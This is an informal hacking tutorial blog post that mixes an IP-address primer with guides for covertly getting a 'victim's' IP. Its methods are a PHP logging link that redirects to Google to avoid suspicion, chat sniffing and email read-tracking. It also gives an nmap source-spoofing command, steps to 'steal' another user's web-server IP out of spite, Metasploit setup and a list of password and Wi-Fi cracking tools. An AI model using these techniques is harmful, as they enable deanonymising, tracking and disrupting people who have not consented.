IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.

IP address serves for two basic purposes:

1. Host or network interface identification

2. Location Addressing

Now lets move to our moto..........

0x02-How to get IP address of remote computer or victim computer?

There are four techniques to get the IP address of remote computer or victim computer. These are as follows:

1. Using PHP notification script.
2. Sniffing during chat sessions.
3. Using Blogs and Websites.
4. Using read notify service.

Now lets go in detail one by one ....................

1. Using PHP notification script.

Using this Notification script you can get the IP address in just seconds.

Steps of using this PHP script:

Download ip finder script(IP_Finder.ZIP)

1. Open a new account inX10Hosting(or any other free host that supports PHP).
2. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
3. You can rename the ip.php to any name of your choice.
4. Set the permission to777on ip_log.txt.

You have to send the of ip.php to you friend via email or while chatting and ask him to visit that link.Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

2. Sniffing during chat sessions.

With the help of Sniffers like wireshark etc. you can sniff the Gmail, and yahoo or any other chat sessions while we are chatting to any of your friend and extract the IP address from there.

3. Using Blogs and Websites.

This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.

4. Using read notify service.

Using read notify service is an email based service.

Steps to use Read Notify service is as follows:

a)First open the Read Notify website :RCPT

b)Now register on this website and then it will send you confirmation mail. Verify your account.

c)Once your account is activated. Do the following steps to use this service:

1. Compose your email just like you usually would in your own email or web email program.
2. Type: .readnotify.com on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .
3. Send your email.

Some things to remember:

• don’t send to and from the same computer.
• if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keeptyping over the top of the auto-completed one to add the.readnotify.com.
• if you are cc-ing your email to other readers, you must add tracking to all of them.

Using nmap to change a source address

Using nmap to change a source address. The commands used are:

nmap -iflist

...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:

nmap -e eth0 -S 192.168.1.100 192.168.1.109

...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.

How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:

Windows IP Configuration:

Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM


This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.

III. Changing your IP Address

To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.

IV. DDoS & DoS Protection

If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.

V. Web servers & Other Services

If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.

To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get pissed ;)

how to install metasploit in ubuntu?

(1)First download metasploit latest version from here for linux.

(2)next step is move this downloaded file into your home folder. we want to convert run file into executable file. so run following command into your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4)sudo ./metasploit-latest-linux-installer.run
after that uncompress process will start &  it will install automatically.
follow some basic step & get activaton code.
open terminal & run following command

(5)msfconcole 
it will show
msf>

List of Useful Hacking Tools

Here i am listing some good hacking free software which is very useful to hack any system.Download from  HERE.

(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

(2)METASPLOIT-Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.

Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).

The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. The Community, Express, and Pro editions have web-based GUIs.

(3)AIR-CRACK -Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

(4)JOHN THE RIPPER-John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X.. Its primary purpose is to detect weak Unix passwords, though it supports hashes for many other platforms as well. There is an official free version, a community-enhanced version (with many contributed patches but not as much quality assurance), and an inexpensive pro version.

(5)CAIN & ABEL- It`s password cracker tool for windows lke john the ripper (unix).UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

(6)NMAP-Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

YOU CAN DOWNLOAD ALL THIS TOOL FROM BELOW LINK
http://sectools.org/

There are lots of tools,but download which are necessary for you. And use it carefully.